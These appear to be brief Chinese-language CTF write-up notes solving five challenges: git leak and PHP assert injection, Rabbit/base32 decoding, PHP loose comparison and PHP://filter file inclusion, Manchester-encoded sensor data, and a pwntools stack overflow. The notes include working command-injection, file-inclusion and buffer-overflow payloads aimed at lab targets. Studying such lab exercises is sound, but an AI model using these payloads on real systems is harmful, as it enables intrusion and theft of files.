1 mfw(git泄露)
./git,原本以为点了链接下了index文件,就可以打开看源码,结果解析不了
老老实实用了githacker
githacker --url --output 1
assert()
断言(assert)的用法 | 菜鸟教程
命令注入:
/?page=').system('cat ./templates/flag.php');//
assert("strpos('templates/') or system('cat ./templates/flag.php');
//.php', '..') === false") or die("Detected hacking attempt!");
2 salted
base64解密,开头就是salted(AES DES RC4 Rabbit TripleDes)
试了试是Rabbit
全是大写,base32解码;python转字符
hex_string=''
flag_string= ''.join(chr(int(hex_string[i:i+2], 16)) for i in range(0, len(hex_string), 2))
print(flag_string)
3 simple_php(松散比较)
>==,!==,(<>不等于,大于小于是松散比较)
(字符串和数字admin,1admin)(科学计数法0)(ture与非零字符串都是ture)
?a=0abc&b=1235abc
Web_php_include
strstr()函数:大小写敏感,用大写的PHP://来绕过过滤
/?page=PHP://filter/read=convert.base64-encode/resource=fl4gisisish3r3.php
4 传感器2
百度一种可能:曼彻斯特编码
搜了搜wp:解析曼彻斯特编码实战-CSDN博客
删除3E可能是因为温度传感器解码后报文第一个字节为起始位,并无数据,因此从第二个字节开始,得到传感器1中两个解码后的报文有效数据为为0x24d8893ca584100
和0x24d8845abf34100
最后一个字节是校验位
然后涉及CRC校验攻防世界 Misc高手进阶区 7分题 传感器2_攻防世界传感器2-CSDN博客
5ezstack
·打开环境,nc连接checksec用相应ida打开附件:
1.定义了一个字符串v4且距离栈底0x20,有gets函数(危险,可通过此函数进行溢出)
2.发现/bin/sh地址,通过get函数【溢出到此处】,获取权限
from pwn import*
p=remote("node4.anna.nssctf.cn",28968)
payload=b'b'*(0x20+8)+p64(0x400730)
p.sendline(payload)
p.interactive()